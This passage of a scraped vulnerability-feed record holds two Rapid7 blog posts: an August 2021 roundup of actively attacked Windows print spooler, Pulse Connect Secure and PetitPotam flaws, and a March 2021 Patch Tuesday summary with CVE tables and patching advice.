the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * 
[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. 
Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." 
You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. 
Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, they\u2019re still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", 
"CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-13T12:49:58", "description": "\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. 
This allows customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server,** stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. 
These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes 
\n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178 : Inappropriate implementation in Compositing | No | No | N/A | Yes \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes 
\n[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes 
\n[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes 
\n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No \n[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes \n[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution 
Vulnerability | No | No | 9.1 | No \n[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes \n[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution 
Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No 
\n[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No \n[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics 
Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No \n[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No 
\n[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege 
